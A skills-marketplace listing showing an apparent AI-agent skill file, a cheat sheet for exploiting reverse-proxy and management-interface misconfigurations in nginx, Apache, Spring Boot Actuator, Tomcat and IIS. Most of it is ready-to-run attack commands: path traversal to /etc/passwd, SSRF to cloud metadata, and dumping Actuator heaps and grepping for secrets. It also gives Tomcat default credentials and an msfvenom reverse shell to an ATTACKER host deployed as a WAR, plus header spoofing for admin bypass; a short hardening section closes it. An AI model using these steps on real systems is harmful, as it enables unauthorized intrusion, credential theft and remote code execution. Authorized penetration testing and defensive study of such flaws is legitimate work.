Skip to main content

proxy-misconfig

Reverse proxy misconfigurations — nginx alias traversal, Apache mod_rewrite SSRF, Spring Boot Actuator exposure, Tomcat manager, IIS short-name disclosure.

インストールへ移動

ソース情報

リポジトリ
BitterSecurity/Decepticon
ソースの最終更新活動
2026年5月26日 03:12
検出された SKILL.md の言語
英語
スター
5,611
フォーク
1,061

インストール方法

デフォルトでは、最初にソースを確認する Prompt が選択されています。直接コマンドに切り替えるか、ローカルコピーをダウンロードすることもできます。

ソースファイルを確認

インストールを決める前に、SKILL.md と SkillsMP に表示されている付属ファイルをお読みください。

SKILL.md を表示中

SKILL.md
ソースの指示 · 読み取り専用プレビュー
name
proxy-misconfig
description
Reverse proxy misconfigurations — nginx alias traversal, Apache mod_rewrite SSRF, Spring Boot Actuator exposure, Tomcat manager, IIS short-name disclosure.
metadata
{"when_to_use":"reverse proxy nginx apache iis tomcat spring actuator alias rewrite","mitre_attack":"T1190","subdomain":"infrastructure","upstream_ref":"skills/_corpus/payloads/Reverse Proxy Misconfigurations/ + Insecure Management Interface/"}
# Reverse Proxy Misconfigurations ## 1. Nginx alias traversal Nginx `alias` directive (vs `root`) is dangerous when URL pattern is prefix-based but alias is a directory: ```nginx location /static { alias /var/www/static/; # trailing slash CRITICAL } # But buggy: location /static { alias /var/www/static; # NO trailing slash → path traversal possible } ``` Bypass: ``` GET /static../etc/passwd → resolves to /var/www/static../etc/passwd → /var/www/etc/passwd (if exists) GET /static../ → directory listing if autoindex on ``` ## 2. Apache mod_rewrite SSRF ```apache RewriteRule ^/proxy/(.*) http://$1 [P] # Attacker: GET /proxy/internal-host.local/admin → server makes outbound to internal GET /proxy/169.254.169.254/latest/meta-data → AWS metadata SSRF ``` ## 3. Spring Boot Actuator exposure ```bash # Common endpoints if exposed curl $TARGET/actuator curl $TARGET/actuator/env # all env vars including secrets curl $TARGET/actuator/heapdump # full memory dump (often contains tokens/passwords) curl $TARGET/actuator/mappings # all routes curl $TARGET/actuator/loggers # logging config curl $TARGET/actuator/jolokia/ # JMX bridge → RCE in many configs # Pre-2.x style curl $TARGET/env curl $TARGET/dump curl $TARGET/trace curl $TARGET/heapdump ``` ## 4. Tomcat Manager ```bash curl -u tomcat:tomcat $TARGET/manager/text/list # Default creds: # tomcat:tomcat, admin:admin, admin:tomcat, role1:role1 # tomcat:s3cret, manager:manager # If logged in → upload WAR for RCE msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war -o shell.war curl -u admin:admin -T shell.war "$TARGET/manager/text/deploy?path=/shell" curl "$TARGET/shell/" # triggers shell ``` ## 5. IIS short-name disclosure (8.3 names) ```bash # Probe via specific URL pattern + difference in error curl -s -o /dev/null -w "%{http_code}\n" "$TARGET/A*~1*/" # 400 if exists, 404 if not — leaks first chars of files/dirs # Tool: shortscan, IIS_shortname_Scanner ``` ## 6. Nginx merge_slashes off + URL encoded ```bash GET /api//../../admin # if merge_slashes off, internal route mapping bypasses auth GET /api/%2e%2e/admin # URL-encoded traversal ``` ## 7. Header injection via X-Forwarded-* Some apps trust `X-Forwarded-For`/`X-Real-IP` from reverse proxy and use it for auth (admin from internal IP). If proxy doesn't strip incoming headers: ```bash curl -H "X-Forwarded-For: 127.0.0.1" $TARGET/admin curl -H "X-Real-IP: 10.0.0.1" $TARGET/admin curl -H "X-Original-Forwarded-For: 192.168.1.1" $TARGET/admin ``` ## 8. WebSocket Origin bypass via proxy Proxy doesn't validate WebSocket Origin → attacker-origin can connect. ```bash wscat -c "wss://target.com/ws" -H "Origin: https://evil.com" ``` ## 9. HTTP/2 specific attacks Some proxies have h2 → h1 downgrade bugs (smuggling). See `skills/exploit/web/smuggling.md`. ## 10. Tools - **Nuclei templates** for actuator/manager/admin discovery - **JFrog actuator scanner** - **shortscan** for IIS 8.3 - **smuggler.py** for h2 → h1 - **trustedheaders** for header injection ## PoC pattern ```bash # Spring Actuator curl -s "$TARGET/actuator/env" | jq '.propertySources[] | .properties' | head # Heap dump if accessible: curl -s -o /tmp/heap.bin "$TARGET/actuator/heapdump" strings /tmp/heap.bin | grep -iE 'password|token|secret|aws_access' | head ``` ## Severity | Bug | Severity | |---|---| | Actuator `/env` w/ secrets visible | Critical 9.8 | | Tomcat manager default-creds | Critical 9.8 (RCE) | | Nginx alias → /etc/passwd | High 8.0 | | Apache mod_rewrite SSRF → metadata | Critical 9.0 | | IIS short-name disclosure | Medium 4-5 | | X-Forwarded-For trust → admin | Critical 9.8 | ## Defender ```nginx # nginx — always trailing slash on alias location /static/ { alias /var/www/static/; } # Strip X-Forwarded-* from client real_ip_header X-Forwarded-For; set_real_ip_from 10.0.0.0/8; # only trust internal real_ip_recursive on; ``` Spring Boot: ```yaml management: endpoints: web: exposure: include: health, info # never * endpoint: env: enabled: false heapdump: enabled: false ``` ## Cross-references - Upstream: `skills/_corpus/payloads/Reverse Proxy Misconfigurations/` + `Insecure Management Interface/` - SSRF chain: `skills/exploit/web/ssrf.md` - HTTP smuggling: `skills/exploit/web/smuggling.md`
GitHubで見る